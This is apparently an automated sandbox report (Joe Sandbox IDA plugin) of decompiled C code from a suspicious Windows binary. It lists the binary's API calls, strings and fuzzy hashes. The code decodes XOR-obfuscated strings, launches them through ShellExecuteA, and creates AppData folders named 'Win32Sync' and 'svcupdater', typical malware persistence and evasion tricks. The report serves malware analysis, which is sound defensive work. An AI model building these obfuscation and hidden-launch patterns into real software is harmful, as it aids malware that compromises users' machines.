				asm("cdq");
				_t642 = _v4536;
				_t649 = 0;
				_v4508 = _t387 % 0x96 + 0x2bc;
				do {
					 *((char*)(_t649 + _t642)) = E0041BEE3(0x96);
					_t649 = _t649 + 1;
				} while (_t649 < 0x100000);
				_t643 = _v4508;
				_t650 = _v4536;
				if(_t643 > 0) {
					do {
						_push(0);
						_push(0x100000);
						_push(_t650);
						L56(); // executed
						_t643 = _t643 - 1;
					} while (_t643 != 0);
				}
				E0041AC1E(_t650); // executed
				_t661 = _t660 + 4;
				E00407DB0( &_v4316);
				if(E00406F50( &_v4312) == 0) {
					E00403A00(_t540,  &_v4316 +  *((intOrPtr*)(_v4316 + 4)), 0x00000002 + (0 |  *((intOrPtr*)( &_v4316 +  *((intOrPtr*)(_v4316 + 4)) + 0x38)) == 0x00000000) * 0x00000004 |  *( &_v4316 +  *((intOrPtr*)(_v4316 + 4)) + 0xc), 0);
				}
				if(E00406F50( &_v4484) == 0) {
					E00403A00(_t540,  &_v4500 +  *((intOrPtr*)(_v4500 + 4)), 0x00000002 + (0 |  *((intOrPtr*)( &_v4500 +  *((intOrPtr*)(_v4500 + 4)) + 0x38)) == 0x00000000) * 0x00000004 |  *( &_v4500 +  *((intOrPtr*)(_v4500 + 4)) + 0xc), 0);
				}
				_t621 = 0x37;
				_v4528 = 0x45541837;
				_v4524 = 0x52435652;
				_t556 = 0;
				_v4520 = 0x59431817;
				_v4516 = 0x1517;
				_v4514 = 0;
				while(1) {
					( &_v4527)[_t556] = ( &_v4527)[_t556] ^ _t621;
					_t556 = _t556 + 1;
					if(_t556 >= 0xd) {
						break;
					}
					_t621 = _v4528;
				}
				_t557 =  &_v4527;
				_v4514 = 0;
				_t622 = _t557 + 1;
				do {
					_t395 =  *_t557;
					_t557 = _t557 + 1;
					__eflags = _t395;
				} while (_t395 != 0);
				_t558 = _t557 - _t622;
				_t623 =  *0x444fa8; // 0xa
				__eflags = 0x7fffffff - _t623 - _t558;
				if(0x7fffffff - _t623 < _t558) {
					E00401BD0(_t540, _t558, _t623);
					goto L54;
				} else {
					__eflags =  *0x444fac - 0x10;
					_t432 =  >=  ?  *0x444f98 : 0x444f98;
					L00402A70(_t540,  &_v4652, _t643, _t650, _v4507, _t558,  &_v4527, _t558,  >=  ?  *0x444f98 : 0x444f98, _t623);
					_v8 = 0xa;
					_v4529 = 0x2e;
					_v4512 = 0xc;
					_v4511 = 0x0000002e ^ _v4512;
					_t438 = _v4512;
					_v4504 = 0;
					_t573 = 0x0000007e ^ _t438 ^ _t438;
					_v4510 = _t573;
					_t629 = 0x00000023 ^ _t438;
					_v4507 = _t573;
					_t439 = _t438 ^ _t438;
					_v4509 = _t629;
					_v4508 = _t439;
					_v4505 = _v4529 ^ _v4512;
					_v4506 = _t629 ^ _t439;
					_v4504 = 0;
					_t443 = E00402530( &_v4652,  &_v4511);
					_v4544 = 0;
					asm("xorps xmm0, xmm0");
					asm("movups [ebp-0x11cc], xmm0");
					_v4540 = 0;
					asm("movups xmm0, [eax]");
					asm("movups [ebp-0x11cc], xmm0");
					asm("movq xmm0, [eax+0x10]");
					asm("movq [ebp-0x11bc], xmm0");
					 *(_t443 + 0x10) = 0;
					 *(_t443 + 0x14) = 0xf;
					 *_t443 = 0;
					_v8 = 0xb;
					_t444 = E00402760( &_v4628,  &_v4560, 0x443ad4);
					_t661 = _t661 + 4;
					_t632 = _t444;
					_v8 = 0xc;
					_t576 = 0;
					__eflags = 0;
					asm("movaps xmm0, [0x43efd0]");
					asm("movups [ebp-0x11f8], xmm0");
					_v4572 = 0x2c717e3b;
					asm("movaps xmm0, [0x43f080]");
					asm("movups [ebp-0x11e8], xmm0");
					_v4568 = 0x7e6f7e37;
					_v4564 = 0x3871;
					_v4562 = 0;
					do {
						 *(_t655 + _t576 - 0x11f7) =  *(_t655 + _t576 - 0x11f7) ^ _v4604;
						_t576 = _t576 + 1;
						__eflags = _t576 - 0x29;
					} while (_t576 < 0x29);
					_v4562 = 0;
					_t447 = E00402530(_t632,  &_v4603);
					_v4124 = 0;
					asm("xorps xmm0, xmm0");
					asm("movups [ebp-0x1028], xmm0");
					_v4120 = 0;
					asm("movups xmm0, [eax]");
					asm("movups [ebp-0x1028], xmm0");
					asm("movq xmm0, [eax+0x10]");
					asm("movq [ebp-0x1018], xmm0");
					 *(_t447 + 0x10) = 0;
					 *(_t447 + 0x14) = 0xf;
					 *_t447 = 0;
					_v8 = 0xb;
					_t578 = _v4608;
					__eflags = _t578 - 0x10;
					if(_t578 < 0x10) {
						L37:
						_v8 = 0xa;
						_t579 = _v4540;
						_v4612 = 0;
						_v4608 = 0xf;
						_v4628 = 0;
						__eflags = _t579 - 0x10;
						if(_t579 < 0x10) {
							L41:
							_v8 = 7;
							_t580 = _v4632;
							_v4544 = 0;
							_v4540 = 0xf;
							_v4560 = 0;
							__eflags = _t580 - 0x10;
							if(_t580 < 0x10) {
								L45:
								__eflags = _v4120 - 0x10;
								_t633 = 0x4c;
								_v4528 = 0x242f3f4c;
								_t650 =  >=  ? _v4140 :  &_v4140;
								_t581 = 0;
								__eflags = 0;
								_v4524 = 0x273f2d38;
								_v4520 = 0x3429623f;
								_v4516 = 0x29;
								while(1) {
									( &_v4527)[_t581] = ( &_v4527)[_t581] ^ _t633;
									_t581 = _t581 + 1;
									__eflags = _t581 - 0xc;
									if(_t581 >= 0xc) {
										break;
									}
									_t236 =  &_v4528; // 0x242f3f4c
									_t633 =  *_t236;
								}
								_v4507 = 0;
								_v4515 = 0;
								_v4512 = 0x64;
								_v4507 = 0;
								_v4511 = 0xb;
								_v4508 = 0xa;
								_t635 = 0x71;
								_v4510 = 0x70;
								_v4509 = 0x71;
								ShellExecuteA(0,  &_v4511,  &_v4527, _t650, 0, 0);
								_t585 = _v4120;
								__eflags = _t585 - 0x10;
								if(_t585 < 0x10) {
									L52:
									_v4124 = 0;
									_v4120 = 0xf;
									_v4140 = 0;
									 *((intOrPtr*)(_t655 +  *((intOrPtr*)(_v4316 + 4)) - 0x10d8)) = 0x43ea70;
									_t257 =  &_v4316; // 0x43ea70
									_t259 =  *((intOrPtr*)( *_t257 + 4)) - 0x68; // -104
									 *((intOrPtr*)(_t655 +  *((intOrPtr*)( *_t257 + 4)) - 0x10dc)) = _t259;
									E00405690( &_v4312);
									_t263 =  &_v4316; // 0x43ea70
									 *((intOrPtr*)(_t655 +  *((intOrPtr*)( *_t263 + 4)) - 0x10d8)) = 0x43ea98;
									_t268 = _v4316 + 4; // 0x74636576
									_t269 =  *_t268 - 8; // 0x7463656e
									 *((intOrPtr*)(_t655 +  *_t268 - 0x10dc)) = _t269;
									_v8 = 0xd;
									_v4212 = 0x43ea28;
									E004128AD( &_v4212);
									 *((intOrPtr*)(_t655 +  *((intOrPtr*)(_v4500 + 4)) - 0x1190)) = 0x43ea90;
									_t280 = _v4500 + 4; // 0x43f75c
									_t281 =  *_t280 - 0x70; // 0x43f6ec
									 *((intOrPtr*)(_t655 +  *_t280 - 0x1194)) = _t281;
									E00405690( &_v4484);
									_t286 = _v4500 + 4; // 0x43f75c
									 *((intOrPtr*)(_t655 +  *_t286 - 0x1190)) = 0x43ea88;
									_t290 = _v4500 + 4; // 0x43fa70
									_t291 =  *_t290 - 0x18; // 0x43fa58
									 *((intOrPtr*)(_t655 +  *_t290 - 0x1194)) = _t291;
									_v8 = 0xe;
									_v4388 = 0x43ea28;
									_t477 = E004128AD( &_v4388);
									 *[fs:0x0] = _v16;
									_pop(_t647);
									_pop(_t654);
									__eflags = _v20 ^ _t655;
									return E0041361E(_t477, _t540, _v20 ^ _t655, _t635, _t647, _t654);
								} else {
									_t635 = _v4140;
									_t596 = _t585 + 1;
									_t479 = _v4140;
									__eflags = _t596 - 0x1000;
									if(_t596 < 0x1000) {
										L51:
										_push(_t596);
										E004138AD(_t635);
										_t661 = _t661 + 8;
										goto L52;
									} else {
										_t623 =  *((intOrPtr*)(_t479 - 4));
										_t558 = _t596 + 0x23;
										__eflags = _t479 -  *((intOrPtr*)(_t479 - 4)) + 0xfffffffc - 0x1f;
										if(_t479 -  *((intOrPtr*)(_t479 - 4)) + 0xfffffffc > 0x1f) {
											goto L55;
										} else {
											goto L51;
										}
									}
								}
							} else {
								_t636 = _v4652;
								_t597 = _t580 + 1;
								_t483 = _v4652;
								__eflags = _t597 - 0x1000;
								if(_t597 < 0x1000) {
									L44:
									_push(_t597);
									E004138AD(_t636);
									_t661 = _t661 + 8;
									goto L45;
								} else {
									_t623 =  *((intOrPtr*)(_t483 - 4));
									_t558 = _t597 + 0x23;
									__eflags = _t483 -  *((intOrPtr*)(_t483 - 4)) + 0xfffffffc - 0x1f;
									if(_t483 -  *((intOrPtr*)(_t483 - 4)) + 0xfffffffc > 0x1f) {
										goto L54;
									} else {
										goto L44;
									}
								}
							}
						} else {
							_t637 = _v4560;
							_t598 = _t579 + 1;
							_t487 = _v4560;
							__eflags = _t598 - 0x1000;
							if(_t598 < 0x1000) {
								L40:
								_push(_t598);
								E004138AD(_t637);
								_t661 = _t661 + 8;
								goto L41;
							} else {
								_t623 =  *((intOrPtr*)(_t487 - 4));
								_t558 = _t598 + 0x23;
								__eflags = _t487 -  *((intOrPtr*)(_t487 - 4)) + 0xfffffffc - 0x1f;
								if(_t487 -  *((intOrPtr*)(_t487 - 4)) + 0xfffffffc > 0x1f) {
									goto L54;
								} else {
									goto L40;
								}
							}
						}
					} else {
						_t638 = _v4628;
						_t599 = _t578 + 1;
						_t491 = _v4628;
						__eflags = _t599 - 0x1000;
						if(_t599 < 0x1000) {
							L36:
							_push(_t599);
							E004138AD(_t638);
							_t661 = _t661 + 8;
							goto L37;
						} else {
							_t623 =  *((intOrPtr*)(_t491 - 4));
							_t558 = _t599 + 0x23;
							__eflags = _t491 -  *((intOrPtr*)(_t491 - 4)) + 0xfffffffc - 0x1f;
							if(_t491 -  *((intOrPtr*)(_t491 - 4)) + 0xfffffffc > 0x1f) {
								L54:
								E0041805F(_t540, _t558, _t623);
								L55:
								E0041805F(_t540, _t558, _t623);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t655);
								_push(0xffffffff);
								_push(0x432685);
								_push( *[fs:0x0]);
								_push(_t540);
								_push(_t650);
								_push(_t643);
								_t402 =  *0x443048; // 0x35200185
								_push(_t402 ^ _t661);
								 *[fs:0x0] =  &_v52;
								_v56 = _t661 - 0x14;
								_t651 = _t558;
								_v60 = _t651;
								_t644 = 0;
								_v64 = 0;
								_v72 = _t651;
								_t559 =  *( *((intOrPtr*)( *_t651 + 4)) + _t651 + 0x38);
								__eflags = _t559;
								if(_t559 != 0) {
									 *((intOrPtr*)( *_t559 + 4))();
								}
								_v12 = 0;
								_t560 =  *_t651;
								_t408 =  *(_t560 + 4) + _t651;
								__eflags =  *(_t408 + 0xc);
								if( *(_t408 + 0xc) == 0) {
									_t409 =  *(_t408 + 0x3c);
									__eflags = _t409;
									if(_t409 == 0) {
										L63:
										_t410 = 1;
									} else {
										__eflags = _t409 - _t651;
										if(_t409 == _t651) {
											goto L63;
										} else {
											E00407DB0(_t409);
											_t560 =  *_t651;
											_t428 =  *(_t560 + 4);
											__eflags =  *(_t428 + _t651 + 0xc);
											_t410 = _t428 & 0xffffff00 |  *(_t428 + _t651 + 0xc) == 0x00000000;
										}
									}
								} else {
									_t410 = 0;
								}
								_v36 = _t410;
								_v12 = 1;
								__eflags = _t410;
								if(_t410 != 0) {
									_t624 = _a8;
									__eflags = _t624;
									if(__eflags >= 0) {
										_t540 = _a4;
										if(__eflags > 0) {
											L69:
											_v12 = 2;
											_t426 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *(_t560 + 4) + _t651 + 0x38)))) + 0x24))))(_v0, _t540, _t624); // executed
											__eflags = _t426 - _t540;
											if(_t426 != _t540) {
												L71:
												_t644 = 4;
											} else {
												__eflags = _t624 - _a8;
												if(_t624 != _a8) {
													goto L71;
												}
											}
											_v12 = 1;
										} else {
											__eflags = _t540;
											if(_t540 != 0) {
												goto L69;
											}
										}
									}
								} else {
									_t644 = 4;
								}
								_t562 =  *((intOrPtr*)( *_t651 + 4)) + _t651;
								__eflags =  *(_t562 + 0x38);
								_t413 =  !=  ? 0 : 4;
								_t414 = ( !=  ? 0 : 4) |  *(_t562 + 0xc) | _t644;
								E00403A00(_t540, _t562, ( !=  ? 0 : 4) |  *(_t562 + 0xc) | _t644, 0);
								_v12 = 4;
								_t416 = L00412875(_t562, __eflags);
								__eflags = _t416;
								if(_t416 == 0) {
									E00407EE0();
								}
								_v12 = 5;
								_t563 =  *( *((intOrPtr*)( *_t651 + 4)) + _t651 + 0x38);
								__eflags = _t563;
								if(_t563 != 0) {
									 *((intOrPtr*)( *_t563 + 8))();
								}
								 *[fs:0x0] = _v20;
								return _t651;
							} else {
								goto L36;
							}
						}
					}
				}
			}

0x00411470
0x00411470
0x00411473
0x00411475
0x00411480
0x00411486
0x0041148b
0x00411490
0x00411492
0x00411495
0x00411496
0x00411497
0x0041149b
0x004114a1
0x004114b9
0x004114c1
0x004114d5
0x004114da
0x004114e4
0x004114ee
0x004114f8
0x00411502
0x0041150f
0x0041151c
0x00411526
0x00411529
0x00411539
0x00411544
0x0041154c
0x00411551
0x00411561
0x00411572
0x00411575
0x00411578
0x00411585
0x00411595
0x0041159f
0x004115a4
0x004115ae
0x004115b8
0x004115c2
0x004115cc
0x004115d6
0x004115d9
0x004115e3
0x004115f3
0x004115fd
0x00411608
0x0041160d
0x0041161d
0x00411628
0x00411631
0x00411634
0x00411641
0x00411646
0x00411656
0x00411664
0x004116ff
0x0041170b
0x00411710
0x0041171d
0x0041171d
0x0041166a
0x0041166a
0x0041166c
0x0041166f
0x00411674
0x00411679
0x00000000
0x0041167f
0x00411688
0x00411693
0x00411696
0x0041169e
0x004116a7
0x004116ac
0x004116b1
0x004116bb
0x004116c0
0x004116c4
0x004116cc
0x004116d3
0x004116d7
0x004116df
0x004116df
0x004116d7
0x004116ed
0x004116ef
0x004116fa
0x004116fa
0x00411679
0x00411723
0x00411734
0x00411742
0x004117dd
0x004117dd
0x004117e3
0x004117e9
0x004117ee
0x004117fb
0x004117fb
0x00411748
0x00411748
0x0041174a
0x0041174d
0x00411752
0x00411757
0x00000000
0x0041175d
0x00411766
0x00411771
0x00411774
0x0041177c
0x00411785
0x0041178a
0x0041178f
0x00411799
0x0041179e
0x004117a2
0x004117aa
0x004117b1
0x004117b5
0x004117bd
0x004117bd
0x004117b5
0x004117cb
0x004117cd
0x004117d8
0x004117d8
0x00411757
0x00411801
0x00411817
0x00411820
0x00411830
0x00411835
0x00411841
0x00411847
0x0041184d
0x0041184e
0x0041185c
0x0041186e
0x00411873
0x00411878
0x0041187d
0x00411880
0x00411886
0x0041188b
0x00411893
0x0041189f
0x004118a1
0x004118a7
0x004118ac
0x004118af
0x004118b0
0x004118b8
0x004118be
0x004118c6
0x004118c8
0x004118c8
0x004118ca
0x004118cf
0x004118d6
0x004118db
0x004118db
0x004118c8
0x004118e1
0x004118e6
0x004118ef
0x00411901
0x00411927
0x00411927
0x00411939
0x0041195f
0x0041195f
0x00411964
0x00411966
0x00411970
0x0041197a
0x0041197c
0x00411986
0x0041198f
0x00411996
0x0041199c
0x0041199f
0x004119a3
0x00000000
0x00000000
0x004119a5
0x004119a5
0x004119ad
0x004119b3
0x004119ba
0x004119c0
0x004119c0
0x004119c2
0x004119c3
0x004119c3
0x004119c7
0x004119ce
0x004119d6
0x004119d8
0x00411eb6
0x00000000
0x004119de
0x004119de
0x004119eb
0x00411a08
0x00411a0d
0x00411a13
0x00411a1b
0x00411a2c
0x00411a34
0x00411a3e
0x00411a45
0x00411a47
0x00411a4d
0x00411a4f
0x00411a55
0x00411a57
0x00411a5f
0x00411a77
0x00411a84
0x00411a8a
0x00411a91
0x00411a96
0x00411aa0
0x00411aa3
0x00411aaa
0x00411ab4
0x00411ab7
0x00411abe
0x00411ac3
0x00411acb
0x00411ad2
0x00411ad9
0x00411ae7
0x00411af1
0x00411af6
0x00411af9
0x00411afb
0x00411aff
0x00411aff
0x00411b01
0x00411b08
0x00411b0f
0x00411b19
0x00411b20
0x00411b27
0x00411b31
0x00411b3a
0x00411b41
0x00411b47
0x00411b4e
0x00411b4f
0x00411b4f
0x00411b5a
0x00411b64
0x00411b69
0x00411b73
0x00411b76
0x00411b7d
0x00411b87
0x00411b8a
0x00411b91
0x00411b96
0x00411b9e
0x00411ba5
0x00411bac
0x00411baf
0x00411bb3
0x00411bb9
0x00411bbc
0x00411bed
0x00411bed
0x00411bf1
0x00411bf7
0x00411c01
0x00411c0b
0x00411c12
0x00411c15
0x00411c46
0x00411c46
0x00411c4a
0x00411c50
0x00411c5a
0x00411c64
0x00411c6b
0x00411c6e
0x00411c9f
0x00411c9f
0x00411cac
0x00411cae
0x00411cb8
0x00411cbf
0x00411cbf
0x00411cc1
0x00411ccb
0x00411cd5
0x00411ce0
0x00411ce6
0x00411ce9
0x00411cea
0x00411ced
0x00000000
0x00000000
0x00411cef
0x00411cef
0x00411cef
0x00411cf9
0x00411d04
0x00411d0d
0x00411d15
0x00411d1e
0x00411d26
0x00411d41
0x00411d43
0x00411d4b
0x00411d51
0x00411d57
0x00411d5d
0x00411d60
0x00411d91
0x00411d97
0x00411da1
0x00411dab
0x00411db5
0x00411dc0
0x00411dc9
0x00411dcc
0x00411dd9
0x00411dde
0x00411de7
0x00411df8
0x00411dfb
0x00411dfe
0x00411e0b
0x00411e10
0x00411e1a
0x00411e2b
0x00411e3c
0x00411e3f
0x00411e42
0x00411e4f
0x00411e5a
0x00411e5d
0x00411e6e
0x00411e71
0x00411e74
0x00411e81
0x00411e89
0x00411e93
0x00411e9e
0x00411ea6
0x00411ea7
0x00411eab
0x00411eb5
0x00411d62
0x00411d62
0x00411d68
0x00411d69
0x00411d6b
0x00411d71
0x00411d87
0x00411d87
0x00411d89
0x00411d8e
0x00000000
0x00411d73
0x00411d73
0x00411d76
0x00411d7e
0x00411d81
0x00000000
0x00000000
0x00000000
0x00000000
0x00411d81
0x00411d71
0x00411c70
0x00411c70
0x00411c76
0x00411c77
0x00411c79
0x00411c7f
0x00411c95
0x00411c95
0x00411c97
0x00411c9c
0x00000000
0x00411c81
0x00411c81
0x00411c84
0x00411c8c
0x00411c8f
0x00000000
0x00000000
0x00000000
0x00000000
0x00411c8f
0x00411c7f
0x00411c17
0x00411c17
0x00411c1d
0x00411c1e
0x00411c20
0x00411c26
0x00411c3c
0x00411c3c
0x00411c3e
0x00411c43
0x00000000
0x00411c28
0x00411c28
0x00411c2b
0x00411c33
0x00411c36
0x00000000
0x00000000
0x00000000
0x00000000
0x00411c36
0x00411c26
0x00411bbe
0x00411bbe
0x00411bc4
0x00411bc5
0x00411bc7
0x00411bcd
0x00411be3
0x00411be3
0x00411be5
0x00411bea
0x00000000
0x00411bcf
0x00411bcf
0x00411bd2
0x00411bda
0x00411bdd
0x00411ebb
0x00411ebb
0x00411ec0
0x00411ec0
0x00411ec5
0x00411ec6
0x00411ec7
0x00411ec8
0x00411ec9
0x00411eca
0x00411ecb
0x00411ecc
0x00411ecd
0x00411ece
0x00411ecf
0x00411ed0
0x00411ed3
0x00411ed5
0x00411ee0
0x00411ee4
0x00411ee5
0x00411ee6
0x00411ee7
0x00411eee
0x00411ef2
0x00411ef8
0x00411efb
0x00411efd
0x00411f02
0x00411f04
0x00411f07
0x00411f0d
0x00411f11
0x00411f13
0x00411f17
0x00411f17
0x00411f1a
0x00411f21
0x00411f26
0x00411f28
0x00411f2c
0x00411f32
0x00411f35
0x00411f37
0x00411f53
0x00411f53
0x00411f39
0x00411f39
0x00411f3b
0x00000000
0x00411f3d
0x00411f3f
0x00411f44
0x00411f46
0x00411f49
0x00411f4e
0x00411f4e
0x00411f3b
0x00411f2e
0x00411f2e
0x00411f2e
0x00411f55
0x00411f58
0x00411f5f
0x00411f61
0x00411f6a
0x00411f6d
0x00411f6f
0x00411f71
0x00411f74
0x00411f7a
0x00411f7a
0x00411f8f
0x00411f91
0x00411f93
0x00411f9a
0x00411f9a
0x00411f95
0x00411f95
0x00411f98
0x00000000
0x00000000
0x00411f98
0x00411fd6
0x00411f76
0x00411f76
0x00411f78
0x00000000
0x00000000
0x00411f78
0x00411f74
0x00411f63
0x00411f63
0x00411f63
0x00411fe9
0x00411ff2
0x00411ff5
0x00411ff8
0x00411ffb
0x00412000
0x00412007
0x0041200c
0x0041200e
0x00412012
0x00412012
0x00412017
0x00412020
0x00412024
0x00412026
0x0041202a
0x0041202a
0x00412032
0x00412040
0x00000000
0x00000000
0x00000000
0x00411bdd
0x00411bcd
0x00411bbc

APIs

CreateDirectoryA.KERNELBASE(00443AEC,00000000), ref: 004114C1

Part of subcall function 00407F70: std::locale::_Init.LIBCPMT ref: 00408002

Part of subcall function 00407040: std::locale::_Init.LIBCPMT ref: 00407092

Part of subcall function 00408400: std::_Lockit::_Lockit.LIBCPMT ref: 00408436
Part of subcall function 00408400: std::_Lockit::_Lockit.LIBCPMT ref: 00408458
Part of subcall function 00408400: std::_Lockit::~_Lockit.LIBCPMT ref: 00408478
Part of subcall function 00408400: std::_Lockit::~_Lockit.LIBCPMT ref: 0040849F

ShellExecuteA.SHELL32(00000000,?,?,?,00000000,00000000), ref: 00411D51
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00411E1A
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00411E93

Strings

;~q,, xrefs: 00411B0F
7~o~, xrefs: 00411B27
q8, xrefs: 00411B31
(, xrefs: 004115E3
`, xrefs: 004115FD
L?/$8-?'?b)4), xrefs: 00411CEF
X, xrefs: 00411539
svcupdater, xrefs: 004119E5, 004119F2
pC, xrefs: 00411628, 004117DD, 004117E3, 00411DC0, 00411DDE

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: Lockitstd::_$InitIos_base_dtorLockit::_Lockit::~_std::ios_base::_std::locale::_$CreateDirectoryExecuteShell
String ID: ($7~o~$;~q,$L?/$8-?'?b)4)$X$`$pC$q8$svcupdater
API String ID: 931165786-3809933125
Opcode ID: 8709ac143dd77d261a2c335ff3c16ff673357cca2c8b0bd85048a0db035ab7be
Instruction ID: 4923e22fe3a22a6b6f0130d0e6dafac16d62dc9ee2cb4d05c0e02e21433304ff
Opcode Fuzzy Hash: 8709ac143dd77d261a2c335ff3c16ff673357cca2c8b0bd85048a0db035ab7be
Instruction Fuzzy Hash: 4E52B3749002988FDB28DF24CC95BD9BBB4AF19308F1481EAE64DA7291D7749EC8CF44

Uniqueness

Uniqueness Score: -1.00%

Function 004041D0 Relevance: 14.7, APIs: 4, Strings: 4, Instructions: 654
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E004041D0(signed int __ebx, void* __edi, void* __esi) {
				struct HINSTANCE__* _v8;
				char _v16;
				signed int _v20;
				char _v276;
				char _v532;
				char _v792;
				char _v1052;
				long _v1056;
				struct HINSTANCE__* _v1060;
				struct HINSTANCE__* _v1064;
				signed char _v1080;
				char _v1083;
				signed char _v1084;
				signed char _v1085;
				signed char _v1086;
				signed char _v1087;
				signed int _v1088;
				struct HINSTANCE__* _v1092;
				struct HINSTANCE__* _v1096;
				signed char _v1112;
				struct HINSTANCE__* _v1116;
				struct HINSTANCE__* _v1120;
				signed char _v1136;
				intOrPtr _v1140;
				signed char _v1160;
				intOrPtr _v1164;
				char _v1184;
				signed int _t194;
				signed int _t195;
				intOrPtr _t198;
				intOrPtr _t203;
				intOrPtr _t217;
				void* _t221;
				intOrPtr _t225;
				void* _t231;
				char* _t232;
				intOrPtr _t237;
				void* _t241;
				char* _t242;
				void* _t245;
				signed char _t248;
				intOrPtr _t254;
				intOrPtr _t263;
				intOrPtr _t266;
				char* _t272;
				signed int _t279;
				signed int _t281;
				signed char _t283;
				signed char _t287;
				signed char _t291;
				intOrPtr _t295;
				signed char _t299;
				signed char _t303;
				signed char _t307;
				signed char _t311;
				signed char _t315;
				signed char _t319;
				signed char _t323;
				signed char _t327;
				intOrPtr* _t332;
				intOrPtr* _t336;
				int* _t337;
				struct HINSTANCE__* _t342;
				intOrPtr _t343;
				intOrPtr* _t345;
				signed char _t353;
				struct HINSTANCE__* _t357;
				struct HINSTANCE__* _t358;
				intOrPtr _t359;
				intOrPtr* _t361;
				signed char _t369;
				struct HINSTANCE__* _t373;
				struct HINSTANCE__* _t374;
				intOrPtr _t375;
				struct HINSTANCE__* _t376;
				int* _t381;
				intOrPtr* _t382;
				intOrPtr* _t385;
				intOrPtr* _t388;
				intOrPtr _t396;
				intOrPtr _t397;
				struct HINSTANCE__* _t398;
				struct HINSTANCE__* _t399;
				intOrPtr* _t401;
				int* _t402;
				int* _t403;
				void* _t404;
				void* _t405;
				void* _t406;
				int* _t407;
				int* _t408;
				void* _t409;
				int* _t410;
				int* _t411;
				void* _t412;
				int* _t413;
				void* _t414;
				void* _t415;
				signed char _t423;
				void* _t429;
				void* _t430;
				void* _t431;
				void* _t444;
				void* _t445;
				void* _t446;
				void* _t450;
				intOrPtr _t451;
				void* _t452;
				void* _t453;
				signed int _t456;
				void* _t457;
				void* _t458;
				void* _t459;
				void* _t460;
				void* _t520;

				_t331 = __ebx;
				_t454 = _t456;
				_t457 = _t456 - 0x490;
				_t194 =  *0x443048; // 0x35200185
				_t195 = _t194 ^ _t456;
				_v20 = _t195;
				 *[fs:0x0] =  &_v16;
				__imp__SHGetFolderPathA(0, 0x1a, 0, 0,  &_v792, _t195, __edi, __esi,  *[fs:0x0], 0x431828, 0xffffffff, _t453); // executed
				asm("xorps xmm0, xmm0");
				_v1064 = 0;
				_t332 =  &_v792;
				_v1060 = 0;
				asm("movups [ebp-0x434], xmm0");
				_t414 = _t332 + 1;
				do {
					_t198 =  *_t332;
					_t332 = _t332 + 1;
				} while (_t198 != 0);
				_push(_t332 - _t414);
				_push( &_v792);
				E00402830(__ebx,  &_v1080, _t414, __edi, __esi);
				_v8 = 0;
				_v1088 = 0x19;
				_v1086 = 0;
				_t336 =  &_v1087;
				_v1087 = 0x5c;
				_v1086 = 0;
				_t415 = _t336 + 1;
				do {
					_t203 =  *_t336;
					_t336 = _t336 + 1;
				} while (_t203 != 0);
				_t337 = _t336 - _t415;
				_t416 = _v1064;
				if(0x7fffffff - _v1064 < _t337) {
					E00401BD0(_t331, _t337, _t416);
					goto L89;
				} else {
					_t219 =  >=  ? _v1080 :  &_v1080;
					L00402A70(_t331,  &_v1160, __edi, 0x7fffffff, _v1056,  &_v1087,  >=  ? _v1080 :  &_v1080, _t416,  &_v1087, _t337);
					_v8 = 1;
					_t221 = E00402760( &_v1112,  &_v1160, "Win32Sync");
					_t458 = _t457 + 4;
					E00405C60(_t331, 0x443aec, _t221);
					_t342 = _v1092;
					if(_t342 < 0x10) {
						L9:
						_v8 = 0;
						_t343 = _v1140;
						_v1096 = 0;
						_v1092 = 0xf;
						_v1112 = 0;
						if(_t343 < 0x10) {
							L13:
							_t416 =  *0x443afc; // 0x28
							_v1088 = 0x74;
							_v1086 = 0;
							_t345 =  &_v1087;
							_v1087 = 0x5c;
							_v1086 = 0;
							_t444 = _t345 + 1;
							asm("o16 nop [eax+eax]");
							do {
								_t225 =  *_t345;
								_t345 = _t345 + 1;
							} while (_t225 != 0);
							_t337 = _t345 - _t444;
							if(0x7fffffff - _t416 < _t337) {
								goto L90;
							} else {
								_t229 =  >=  ?  *0x443aec : 0x443aec;
								L00402A70(_t331,  &_v1160, _t444, 0x7fffffff, _v1056,  &_v1087,  >=  ?  *0x443aec : 0x443aec, _t416,  &_v1087, _t337);
								_v8 = 2;
								_t231 = E00402760( &_v1112,  &_v1160, "svcupdater");
								_t459 = _t458 + 4;
								_v8 = 3;
								_v1088 = 0x48;
								_v1087 = 0x30;
								_t353 = _v1088 ^ _v1088;
								_v1083 = 0;
								_v1085 = _t353;
								_t423 = 0x0000002d ^ _t353 ^ _t353;
								_v1086 = _t423;
								_v1084 = _t423;
								_v1083 = 0;
								_t232 = E00402530(_t231,  &_v1087);
								asm("movups xmm0, [eax]");
								asm("movups [ebp-0x46c], xmm0");
								asm("movq xmm0, [eax+0x10]");
								 *(_t232 + 0x10) = 0;
								 *(_t232 + 0x14) = 0xf;
								 *_t232 = 0;
								asm("movq [ebp-0x45c], xmm0");
								E00405C60(_t331, 0x443ad4,  &_v1136);
								_t357 = _v1116;
								if(_t357 < 0x10) {
									L20:
									_v8 = 2;
									_t358 = _v1092;
									if(_t358 < 0x10) {
										L24:
										_v8 = 0;
										_t359 = _v1140;
										_v1096 = 0;
										_v1092 = 0xf;
										_v1112 = 0;
										if(_t359 < 0x10) {
											L28:
											_t416 =  *0x443afc; // 0x28
											_v1088 = 0x4f;
											_v1086 = 0;
											_t361 =  &_v1087;
											_v1087 = 0x5c;
											_v1086 = 0;
											_t445 = _t361 + 1;
											do {
												_t237 =  *_t361;
												_t361 = _t361 + 1;
											} while (_t237 != 0);
											_t337 = _t361 - _t445;
											_t449 = 0x7fffffff - _t416;
											if(0x7fffffff - _t416 < _t337) {
												goto L92;
											} else {
												_t239 =  >=  ?  *0x443aec : 0x443aec;
												L00402A70(_t331,  &_v1160, _t445, _t449, _v1056,  &_v1087,  >=  ?  *0x443aec : 0x443aec, _t416,  &_v1087, _t337);
												_v8 = 4;
												_t241 = E00402760( &_v1112,  &_v1160, "svcupdater");
												_t460 = _t459 + 4;
												_v8 = 5;
